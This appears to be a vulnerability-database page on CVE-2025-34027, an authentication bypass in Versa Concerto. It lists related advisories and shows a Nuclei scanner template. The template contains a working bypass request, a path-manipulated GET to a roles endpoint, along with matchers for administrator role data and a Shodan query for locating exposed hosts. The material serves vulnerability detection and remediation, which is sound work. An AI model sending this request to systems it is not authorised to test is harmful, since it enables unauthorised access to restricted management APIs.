| Reporter | Title | Published | Views | Family All 13 |
|---|---|---|---|---|
| The vulnerability of the Traefik Reverse Proxy Configuration Handler component of the automation and orchestration platform for SD-WAN processes, Versa Concerto, allows a attacker to execute arbitrary code. | 13 Jun 202500:00 | – | bdu_fstec | |
| CVE-2025-34027 | 21 May 202522:41 | – | circl | |
| Versa Concerto SD-WAN 安全漏洞 | 21 May 202500:00 | – | cnnvd | |
| CVE-2025-34027 | 21 May 202521:58 | – | cve | |
| CVE-2025-34027 Versa Concerto Authentication Bypass File Write Remote Code Execution | 21 May 202521:58 | – | cvelist | |
| EUVD-2025-16088 | 3 Oct 202520:07 | – | euvd | |
| CVE-2025-34027 | 21 May 202522:15 | – | nvd | |
| PT-2025-22441 | 21 May 202500:00 | – | ptsecurity | |
| CVE-2025-34027 | 23 May 202522:30 | – | redhatcve | |
| ⚡ Weekly Recap: APT Campaigns, Browser Hijacks, AI Malware, Cloud Breaches and Critical CVEs | 26 May 202509:23 | – | thn |
| Source | Link |
|---|---|
| projectdiscovery | www.projectdiscovery.io/blog/versa-concerto-authentication-bypass-rce/ |
| versa-networks | www.versa-networks.com/documents/datasheets/versa-concerto.pdf |
| cve | www.cve.org/CVERecord |
| security-portal | www.security-portal.versa-networks.com/emailbulletins/6830fa3f28defa375486ff2f |
id: CVE-2025-34027
info:
name: Versa Concerto API Path Based - Authentication Bypass
author: iamnoooob,rootxharsh,parthmalhotra,pdresearch
severity: critical
description: |
Authentication bypass in the Versa Concerto API, caused by URL decoding inconsistencies. It allowed unauthorized access to certain API endpoints by manipulating the URL path.This issue enabled attackers to bypass authentication controls and access restricted resources.
impact: |
Attackers can bypass authentication through URL path manipulation to access restricted API endpoints and retrieve sensitive role information without credentials.
remediation: |
Upgrade to the latest Versa Concerto version that properly handles URL decoding and path validation in authentication checks.
reference:
- https://projectdiscovery.io/blog/versa-concerto-authentication-bypass-rce/
- https://versa-networks.com/documents/datasheets/versa-concerto.pdf
- https://www.cve.org/CVERecord?id=CVE-2025-34027
- https://security-portal.versa-networks.com/emailbulletins/6830fa3f28defa375486ff2f
classification:
cve-id: CVE-2025-34027
cwe-id: CWE-367
epss-score: 0.35993
epss-percentile: 0.98277
cpe: cpe:2.3:a:versa-networks:concerto:*:*:*:*:*:*:*:*
metadata:
verified: true
vendor: versa-networks
product: concerto
max-request: 1
shodan-query: http.favicon.hash:-534530225
tags: cve,cve2025,versa,concerto,auth-bypass,vkev,vuln
http:
- raw:
- |
GET /portalapi/v1/roles/option;%2fv1%2fping HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: word
part: body
words:
- ENTERPRISE_ADMINISTRATOR
- type: word
part: header
words:
- EECP-CSRF-TOKEN
# digest: 4a0a00473045022100cd15726a4ee25ba15746fbc975d97e6c4ecc8cd85031d321701f1bb67ffec602022026ed8e9f2da081e7411c4f6c4ac266f5b34ec8c485ae90b2580908e9747ccca1:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation